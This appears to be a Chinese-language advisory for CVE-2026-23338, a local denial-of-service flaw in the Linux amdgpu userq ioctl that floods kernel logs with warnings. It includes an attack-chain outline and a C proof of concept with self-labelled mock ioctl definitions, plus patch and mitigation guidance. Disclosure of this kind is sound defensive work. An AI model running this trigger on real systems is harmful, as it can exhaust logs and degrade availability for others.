CVE-2026-23338 CVSS 5.5 中危

CVE-2026-23338: Linux内核amdgpu拒绝服务漏洞

披露日期: 2026-03-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23338

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux kernel

漏洞概述

Linux内核的drm/amdgpu/userq组件存在安全漏洞。本地低权限用户可以通过传递过小的num_fences参数，或者在两次userq等待ioctl调用之间使所需数量合法增长，从而触发内核警告。虽然内核本身逻辑无误，但这会导致系统日志被大量警告信息淹没，消耗系统资源，造成拒绝服务。

技术细节

该漏洞位于Linux内核的AMD GPU驱动程序（drm/amdgpu）的用户队列（userq）处理模块中。漏洞源于对输入参数校验时的副作用处理。当用户空间程序调用userq相关的等待ioctl时，如果传递的num_fences值过小，或者在两次调用期间由于并发操作导致所需的fence数量增加，原始代码中的WARN_ON宏会被触发。WARN_ON会打印详细的内核警告和堆栈回溯信息。攻击者可利用此行为，通过高频触发该检查，导致内核日志（dmesg）被迅速填满，进而可能引发磁盘空间耗尽或系统响应迟滞，影响系统可用性。修复方式是将WARN_ON移除，仅向用户空间返回错误码，避免内核层面的资源浪费。

攻击链分析

STEP 1

本地访问

攻击者获得目标Linux系统的本地低权限用户访问权限。

STEP 2

参数构造

攻击者编写恶意程序，构造包含错误num_fences参数的drm_amdgpu_userq_wait结构体。

STEP 3

触发漏洞

恶意程序执行，通过ioctl调用AMDGPU驱动，故意触发内核中的WARN_ON检查。

STEP 4

拒绝服务

内核打印大量警告回溯信息，导致系统日志溢出或资源耗尽，影响系统可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

// Mock definitions for PoC demonstration
#define DRM_IOCTL_AMDGPU_USERQ_WAIT 0x40
#define AMDGPU_GEM_DOMAIN_GTT 0x2

struct drm_amdgpu_userq_wait {
    __u32 num_fences; // Vulnerable parameter
    __u32 pad;
    __u64 fences;
};

int main() {
    int fd = open("/dev/dri/renderD128", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    struct drm_amdgpu_userq_wait args;
    // Trigger the warning by passing a deliberately small num_fences
    args.num_fences = 0; 
    args.fences = 0;

    printf("Attempting to trigger kernel warning via ioctl...\n");
    
    // This call is expected to fail with errno but may trigger WARN_ON in vulnerable kernels
    int ret = ioctl(fd, DRM_IOCTL_AMDGPU_USERQ_WAIT, &args);

    if (ret < 0) {
        perror("Ioctl failed (expected)");
        printf("Check dmesg for potential kernel warnings/backtrace.\n");
    } else {
        printf("Ioctl succeeded unexpectedly.\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux kernel (修复commit 1753f5f81ab60a553287f9ee659a6ac363adf8d7 之前版本)

防御指南

临时缓解措施

建议尽快应用官方发布的内核补丁。若无法立即升级，应严格限制本地用户权限，并监控内核日志（dmesg）以检测异常的警告洪水攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表